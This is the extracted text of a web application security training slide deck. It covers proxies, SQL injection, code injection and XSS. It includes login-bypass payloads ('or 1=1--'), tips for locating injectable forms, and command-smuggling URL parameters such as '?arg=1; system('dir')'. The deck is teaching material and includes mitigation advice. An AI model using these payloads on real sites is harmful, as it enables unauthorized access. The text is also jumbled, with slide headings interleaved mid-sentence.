1. Sixth Outline Level  Seventh Outline Level  Eighth Outline LevelNinth Outline LevelClick to edit Master text styles Web Application Security Vikas Thange
2. Topics1 What is Web Security2 Why Web Security?3 Proxy Server – Paros Proxy4 Web Vulnerability5 Web Vulnerability Types6 SQL Injection7 Other Types
3. What is Web Security 1 Web application security is a branch of information security that deals specifically with security of websites and web applications. 2 At a high level, Web application security draws on the principles of application security but applies them specifically to Internet and Web systems. 3 Typically web applications are developed using programming languages such as PHP, Java EE, Java, Python, Ruby, ASP.NET, C#, VB.NET or Classic ASP.
4. Why Web Security 1 We value our privacy 2 We value our client’s important data 3 We want to make everyone’s web presence safer and better 4 We must remember , it’s the users who uses the system 5 Users can be good as well as bad
5. Proxy Server 1 A proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers 2 A client connects to the proxy server, requesting some service, such as a file, web page, or other resource, available from a different server. 3 The proxy server evaluates the request according to its filtering rules. If the request is validated by the filter, the proxy provides the resource
6. Use of Proxy Server1 To apply access policy to network services or content, e.g. to block undesired sites.2 To log / audit usage, i.e. to provide company employee Internet usage reporting.3 To bypass security/ parental controls.4 To scan transmitted content for malware before delivery.5 To scan outbound content, e.g., for data leak protection.6 To circumvent regional restrictions.
7. Sparos Proxy Server Tool
8. Web VulnerabilityA vulnerability is a weakness which allows an attacker to reduce asystems information assurance. Weakness in custom Web Application, architecture, design, configuration, or code.
9. Web Vulnerability Types1 SQL Injection2 Code Injection3 XSS or Cross Site Scripting4 CSRF or Cross Site Request Forgery5 To scan outbound content, e.g., for data leak protection.6 Session Security7 Input Validation
10. How Bad is it? **Web Application Security Consortium (WASC) http://www.webappsec.org/projects/statistics/
11. How Bad is it? **Web Application Security Consortium (WASC) http://www.webappsec.org/projects/statistics/
13. SQL InjectionWhat is SQL Injection? • It is a trick to inject SQL query/command as an inputWhat do you need? possibly via web pages.What you should look for? • Many web pages take parameters from web user, andWhat if you cant find any page make SQL query to the database.that takes input?How do you test if it isvulnerable? • Take for instance when a user login, web page that user name and password and make SQL query to the databaseBut why or 1=1--? to check if a user has valid name and password.How to avoid SQL Injection? • With SQL Injection, it is possible for us to send craftedWhere can I get more info? user name and/or password field that will change the SQL query and thus grant us something else.
14. SQL InjectionWhat is SQL Injection? • Little Sql and programming KnowledgeWhat do you need? • No tool requiredWhat you should look for?What if you cant find any page • Any Web Browserthat takes input?How do you test if it isvulnerable? • Sql injection attak dictonaryBut why or 1=1--?How to avoid SQL Injection?Where can I get more info?
15. SQL InjectionWhat is SQL Injection? • Try to look for pages that allow you to submit data,What do you need? i.e: login page, search page, feedback, etc.What you should look for? • Sometimes, HTML pages use POST command to sendWhat if you cant find any page parameters to another ASP page. Therefore, you may notthat takes input? see the parameters in the URL. However, you can checkHow do you test if it isvulnerable? the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in someBut why or 1=1--? HTML codes:How to avoid SQL Injection? <FORM action=Search/search.asp method=post> <input type=hidden name=A value=C>Where can I get more info? </FORM> Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise).
16. SQL InjectionWhat is SQL Injection?What is SQL Injection? • You should look for pages like ASP, JSP, CGI, or PHP webWhat do you need? pages. Try to look especially for URL that takes parameters, like:What you should look for?What if you cant find any page http://duck/index.asp?id=10that takes input?How do you test if it isvulnerable?But why or 1=1--?How to avoid SQL Injection?Where can I get more info?
17. SQL InjectionWhat is SQL injection?What is SQL Injection? • Start with a single quote trick. Input something like:What do you need? hi or 1=1-- Into login, or password, or even in the URL. Example:What you should look for? - Login: hi or 1=1--What if you cant find any page - Pass: hi or 1=1--that takes input? - http://duck/index.asp?id=hi or 1=1—How do you test if it isHow do you tet if it is vulnerable?vulnerable? • If you must do this with a hidden field, just downloadBut why or 1=1--? the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:How to avoid SQL Injection?Where can I get more info? <FORM action=http://duck/Search/search.asp method=post> <input type=hidden name=A value="hi or 1=1--"> </FORM> If luck is on your side, you will get login without any login name or password.
18. SQL InjectionWhat is SQL injection?What is SQL Injection? • Other than bypassing login, it is also possible to viewWhat do you need? extra information that is not normally available. Take an asp page that will link you to another page with theWhat you should look for? following URL:What if you cant find any pagethat takes input? http://duck/index.asp?category=foodHow do you test if it isHow do you tet if it is vulnerable?vulnerable? • In the URL, category is the variable name, and food isBut why or 1=1--? the value assigned to the variable. In order to do that, anHow to avoid SQL Injection? ASP might contain the following codeWhere can I get more info? v_cat = request("category") sqlstr="SELECT * FROM product WHERE PCategory=" & v_cat & "" set rs=conn.execute(sqlstr)
19. SQL InjectionWhat is SQL Injection? • As we can see, our variable will be wrapped into v_catWhat do you need? and thus the SQL statement should become:What you should look for? SELECT * FROM product WHERE PCategory=foodWhat if you cant find any pagethat takes input? The query should return a resultset containing one orHow do you test if it is more rows that match the WHERE condition, in this case,vulnerable? food.But Why ‘ or 1=1--? • Now, assume that we change the URL into somethingHow to avoid SQL Injection? like this:Where can I get more info? http://duck/index.asp?category=food or 1=1-- Now, our variable v_cat equals to "food or 1=1-- ", if weEg. http://testasp.vulnweb.com/ substitute this in the SQL query, we will have:http://www.altoromutual.com SELECT * FROM product WHERE PCategory=food or 1=1--
20. SQL InjectionWhat is SQL Injection? • Filter out character like single quote, double quote, slash,What do you need? back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:What you should look for? - Input from usersWhat if you cant find any page - Parameters from URLthat takes input? - Values from cookieHow do you test if it isvulnerable? For numeric value, convert it to an integer before parsingBut why or 1=1--? it into SQL statement. Or using ISNUMERIC to make sure it is an integer.How to avoid SQL Injection?Where can I get more info?
21. SQL InjectionWhat is SQL Injection? • http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6What do you need? • http://www.blackhat.com/presentations/win-usa-What you should look for? 01/Litchfield/BHWin01Litchfield.docWhat if you cant find any pagethat takes input? • http://www.owasp.org/asac/input_validation/sql.shtmlHow do you test if it isvulnerable? • http://www.sensepost.com/misc/SQLinsertion.htmBut why or 1=1--? • http://www.digitaloffense.net/wargames01/IOWargameHow to avoid SQL Injection? s.pptWhere can I get more info? • http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6 • http://www.spidynamics.com/whitepapers/WhitepaperS QLInjection.pdf
22. Code Injection• Code Injection is the general name for a lot of types of attacks which depend on inserting code, which is interpreted by the application.• Such an attack may be performed by adding strings of characters into a cookie or argument values in the URI.• This attack makes use of lack of accurate input/output data validation, for example:1. class of allowed characters (standard regular expressions classes or custom)2. data format3. amount of expected data4. for numerical input, its values
23. Code InjectionWhen a programmer uses the eval() function and operates on the data inside it, andthese data may be altered by the attacker, then its only one step closer to CodeInjection.The example below shows how to use the eval() function: $myvar = "varname"; $x = $_GET[arg]; eval("$myvar = $x;");The code above which smells like a rose may be used to perform a Code Injection attack.Example: passing in the URI /index.php?arg=1; phpinfo()While exploiting bugs like these, the attacker doesnt have to limit himself only to aCode Injection attack. The attacker may attempt himself to use Command Injectiontechnique, for example. /index.php?arg=1; system(‘dir)
24. Cross Site Scripting Flaw (XSS)• Cross site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted web sites• Cross site scripting flaws are the most prevalent flaw in web applications today• Cross site scripting attacks occur when an attacker uses a web application to send malicious code , generally in the form of a browser side script, to a different end user.• To avoid XSS attack we recommend validating input against a rigorous positive specification of what is expected
25. Client Server Architecture
26. Cross Site Scripting Flaw (XSS) Session id, cookies.